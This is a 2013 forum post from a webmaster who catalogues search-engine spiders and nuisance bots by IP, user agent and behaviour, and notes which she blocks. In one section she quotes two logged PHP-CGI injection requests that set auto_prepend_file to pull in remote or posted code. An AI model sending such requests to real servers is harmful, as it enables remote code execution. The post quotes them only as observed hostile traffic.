Page is a not externally linkable
- Search Engines
-- Search Engine Spider and User Agent Identification
---- Revised Spider IPs and Other Details


lucy24 - 8:08 pm on Feb 11, 2013 (gmt 0)


At Home with the Robots: 2013 edition, Part Two

Given a choice between bisecting a post and trimming it...

The Bad...

New This Year
The robots themselves aren't new, only their position. These are the ones I reclassified from "No skin off my nose" to "Get thee hence!" after last year's closer look.

The plainclothes MSIE-bot
IP: 131.253, 65.52, 65.55
UA: begins with Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1 or 5.2 and then varies at random
robots.txt? What on earth for? I'm just a human who works for Microsoft and therefore naturally uses MSIE 7. Last year, most visits followed a pattern: one random html file, followed by any one non-image subsidiary file like css or js. This year it's nothing but .html files. Maybe it's because they're denied access to that initial page, so they don't know what to ask for next.
Someone hereabouts said that the plainclothes MSIEbot isn't a robot at all; it works for Bing Translate. Personal experiment doesn't support this interpretation, though.

Ezooms
IP: 208.115.111.72, ..113.88 (this year, as last year, it's only these exact two)
UA: Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)
Distinguishing feature: UA that includes a gmail address. I originally blocked them because they share an IP with the not-so-nice dotbot. The dotbot hasn't been around in a while, and ezooms seems to obey robots.txt, so I was thinking of unblocking them. After some cursory research I dropped the idea. Among other things, they claim their connection is through "dotnetcotcom.org" which kinda suggests that it's all the same robot anyway. And I don't think anyone has ever figured out what they do.

YahooCacheSystem
IP: 98.139.241.24n
UA: YahooCacheSystem
I haven't seen these folks since November. But robots sometimes take long breaks, so I mention them here.

Yahoo! Slurp
IP: 72.30, 98.137
UA: Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp) NOT Firefox/3.5
Got that? NOT Firefox 3.5, so don't go treating us as if we were Firefox 3.5, meaning ... uh ... don't lock them out? (Even Camino, whose UA string is a little iffy, says emphatically "like Firefox 3.6". Clearly something must have happened in that 1/10 of a step.) Distinguishing feature: All requests-- blocked, of course-- are followed by the 403 page's style sheet. But by weird coincidence they only ask for the favicon when the original request was for the front page. Hmmm.

This year we also have a
Yahoo! Slurp China
IP: 110.75.173-176
The name says it all. In linguist-speak, this is called Double Markedness.

mail.ru
I've gone back and forth on these guys. Somewhere in the background is a legitimate Russian ISP. Latest discovery: As with bing/msn, there are two entirely different entities. I've provisionally unblocked the robot only. So far they don't seem to have noticed.

Robot:
IP: 217.69.133.68, ..134.56
UA: Mozilla/5.0 (compatible; Mail.RU_Bot/2.0; +http://go.mail.ru/ help/robots)
The robot behaves perfectly well. Asks for and obeys robots.txt, no matter how often it gets the door slammed in its face.

Images:
IP: 217.69.135.91
UA: Mozilla/5.0 (compatible; Mail.RU/2.0c)
and
Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0
This one gets us into profiler territory. Every visit follows the same pattern:
GET {some image from /games/ directory} with blank referer, using first UA
GET {exactly the same thing}
GET {same image file} with referer http://go.mail.ru/search_images, using second UA

Repeat with four more /games/images/ files, for a total of 15 requests at intervals of 1-2 seconds. They do this about twice a month on average. Past experience with a similar pattern suggests they may respond to the 127.0.0.1 redirect; I'll try it one day. A final quirk is this:
217.69.135.91 - - [07/Feb/2013:09:08:08 -0800] "GET http://www.example.com/games/images/SquatterPic.jpg HTTP/1.1" 403 1495 "-" "Mozilla/5.0 (compatible; Mail.RU/2.0c)"
All requests come through like that in logs. File under: Yet another thing that someone once explained to me but I've forgotten the explanation.


Same old same old

Baidu (China):
IP: 123.125; 180.76; 220.181
UAs: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/ search/ spider.html) the same as Baidu-Japan
Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDR; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322; Tablet PC 2.0)

Baidu has been getting clumsy: there's a fair number of requests for broken URLs like "/fonts/naamaj" or "/hovercraft/n". Looking back, I see it was already doing this a year ago. Well, if you're going to get the door slammed in your face regardless, why bother to get the name right?

Soso:
IP: 124.115.6.13
UA: Mozilla/5.0(compatible; Sosospider/2.0; +http://help.soso.com/webspider.htm) note missing space
How are the mighty fallen! Couple of years back, Soso was one of the ickier spiders around. Then, starting around September 2011, it was only allowed to give its name when asking for robots.txt-- the robotic equivalent of working traffic on Staten Island. The rest of the time it came in with a generic MSIE UA. Even this got squashed partway through January 2012, though I didn't realize it at the time. Since then, all the SosoSpider has done is ask for robots.txt. And it can't even get this right. It asks for robots.txt with the wrong form of the domain name, gets redirected, and never bothers to come back and ask again with the correct name. Once a day, every day.

JikeSpider:
IP: 1.202.218.71
UAs: Mozilla/5.0 () and that's all
Mozilla/5.0 (compatible; JikeSpider; +http://shoulu.jike.com/spider.html)
I don't know if this one is on its way in or on its way out. Since it operates from China, it will be blocked regardless.

There are assorted other Chinese robots-- some of whom try to disguise themselves by claiming Russian as their first language-- but they're all much of a muchness.

The Ukrainians
IP: 46.118.118, 92.249.127, 94.153.65.92, 176.8.91.143, 178.137.162.140, 193.106.136, 195.242.218, 213.110.133.221
UA: random
Like the man said: The Ukrainians you will always have with you. But oh! what a pang of nostalgia it gave me to find them still at it. Their favorite page is still lions.html, with occasional forays into duct_tape, Rambles and-- late in the month-- mice.html (a gallery page and therefore pointless without its illustrations, as is lions). They always make two consecutive requests, always with a fake referer and an improbable UA like
Mozilla/3.0 (x86 [en] Windows NT 5.1; Sun)
or
Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)
What do they want? Who knows? Who cares? Maybe it's just referer spam. Most are from .ru domains so they would be blocked even if I didn't already know the IP. The double request is new since last year; they used to come in threes. I'm not complaining.
Note that 176.9 is Hetzner, so 176.8.0.0/15 can be conveniently blocked in one go.

The Russians
IP: 37.139.52.23, 91.223.75, 91.237.249, 95.24.182.19, 176.195
UA: various
Exactly the same as the Ukrainians except that, uh, they're from Russia ;) The set at 91.223.75 (that's 91, so you really are stuck at the /24 level) is a new addition to the block list. They'd always given .ru referers so I never noticed that the IP itself was open, until they came waltzing in with a .com: Oi! How did you get in here?

ahrefsbot
IP: 173.199.114-120
User-Agent: Mozilla/5.0 (compatible; AhrefsBot/2.0; +http://ahrefs.com/robot/)
A year ago:
I have no idea what, if anything, they're about. I just know that they seem to think robots.txt is non-perishable: about once a month they pick up three copies in a batch, and then carry on regardless. Don't know whether they even read it; they don't dig deeply enough for me to be sure.

They've now gone over to a single weekly pickup of robots.txt. And, hm, they seem to be operating from an entirely new IP. They're blocked by UA, so I never noticed.

facebookexternalhit
IP: 66.220.144-159; 69.171.224-255; 173.252.64-127
UAs:
facebookexternalhit/1.0 (+http://www.facebook.com/externalhit_uatext.php)
facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)
The 1.0 UA is apparently brought out to switch-hit when 1.1 gets tired, or anticipates getting tired. When there's a long string of requests for the same file, they go by pairs: 1.1, followed within one second by 1.0.
I have yet to see one iota of evidence that facebookexternalwhatsit can benefit me in any way whatsoever. But I made one change: There's no reason to block HEAD requests, since they're simply confirming that a given image file exists. (I've never prevented them from looking at pages; they show up in logs as 206.)
The 173.252 range is a new one on me; looking back, I first find them in November.

Trendmicro
IP: 150.70 (last year I also met them at 216.104.15)
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Some folks don't mind them. I say I don't like their face. I especially don't care for them requesting piwik files-- accompanied by the same query string that their preceding human just used.

websense
IP: 208.80.194 (full range .192-.199, but .194 is all I see)
User-Agent: varies
Much less active than last year at this time. Whew. Last year I was especially riled about their sister IP, 208.87.232-239, which attacked my sister site, the art studio. I have since learned that the reason they put on such a good impersonation of a human is that they were human. Oops. Under the name SurfControl, this IP is used as a proxy by our country government offices. You might think this serves people right for browsing the web on office machines during work hours, but the studio has a quasi-official status so you have to let them in.

... and similarly
TalkTalk
IP: 62.24
Somewhere at the back of this group is a normal ISP. It's got parental-control functions and anti-virus functions and who knows what else. Anyway, they annoy me.

NOC (for want of a better label)
IP: 184.22.183.114 and ..211.146
UA: Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0
Last year at this time they gave their address as ..182.90 and ..46.14 with the same UA. I didn't especially notice them at the time; there were a few visits in the Miscellaneous bin. I have no idea what they're looking for, but people using FF 6 are generally up to no good. Random skipping through mid-year logs finds them using an even more unlikely "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)". Regardless of exact name and address, they keep asking for the same handful of pages over and over, inparticular the trio
/games/
/games
/games/index.html

which are all, of course, the same file. If they weren't blocked (84.22 complete), two of the three would get redirected.

auto-referers
Still around, and I still haven't found a universal way to block them. Identify after the fact, yes. Make a RewriteRule to send them into oblivion, no. Requests for some of the largest files are individually coded in htaccess; that's about all I can do.


Two for the Profilers

Some robots are distinguished by behavior patterns rather than UA or IP. For the past few months I've been particularly vexed by

the index.php botnet
IP: various
UA: various
That's my personal name for them, faute de mieux. Botnets don't have official names do they?
Pattern: Always four requests, in this order:
#1 any random interior page, usually with auto-referer, sometimes a spam-type referer
#2 /fonts/ with either auto-referer or my front page as referer
#3 /fonts/index.php with /index.php as referer
#4 my front page, again with /index.php as referer.
I've picked out a few recurring IPs for blocking, but in general there's not a ### thing I can do. They're not clearly identifiable until the third request-- and that one's blocked anyway because of the .php extension. I could block the mydomain/index.php referer, but that's about it.

ukiuq.html
IP: various, all of them already blocked
UA: various, from quasi-human to blatantly robotic
Ukiuq (not its real name) is a UCAS legacy font so obscure that-- well-- it's so obscure that when I last searched for its real name, my page popped up in first place. That's obscure.
Pattern: Four requests, in this order:
#1 /fonts/ukiuq.html, with either auto-referer or outside spam referer
#2 my front page, with /fonts/ukiuq.html as referer
#3 my front page, with auto-referer
#4 same again


Gone and Soon Forgotten

A handful of robots that were highly visible last year don't seem to be around any more. Unless they simply took the month off. Shrug.

oBot
Gigabot
orangeask


And The Ugly

These are the unambiguous ones: the robots that stroll in and ask for "login.php" and files with "myadmin" in the name, or try to PUT and POST. There is apparently a finite number of likely robotic IPs, because I didn't get any completely new ones this time around. Most memorable:

GET /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://example.net/nophp/test.php

and similarly

POST /?-n+-d+allow_url_include%3D1+-d+auto_prepend_file%3Dphp%3a%2f%2finput
... sent to the wrong domain name, so it was met with a 301 that magically changed the attempted POST into a GET. (Just recently I read an explanation of how and why this happens, but-- stop me if you've heard this one-- I don't remember the details.)


One-Offs

There weren't nearly as many of these as last year. Mainly:

Robot from UnityMedia
IP: 5.146.82.156
UA: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
60 requests, all 206, 301 or 404. Here's the odd thing: I have no record of ever seeing this IP before. But it must have been here at some time in the distant past, because it came in with a shopping list of files that ceased to exist up to two years ago. Hence the slew of 301s and 404s. The files that did exist were all old ones. But it wasn't programmed to deal with 301s, so it kept picking up the same redirects again and again without ever proceeding to the requested file.

AmazonAWS
IP: 184.72.175.146
UA: Java/1.6.0_24
33 consecutive requests for the same long page. Public-domain content, and the requests were generally a minute or more apart, so it's just the weirdness of the thing. How do they even find this stuff in the first place? What do they do with it?


Thread source:: http://www.webmasterworld.com/search_engine_spiders/4544452.htm
Brought to you by WebmasterWorld: http://www.webmasterworld.com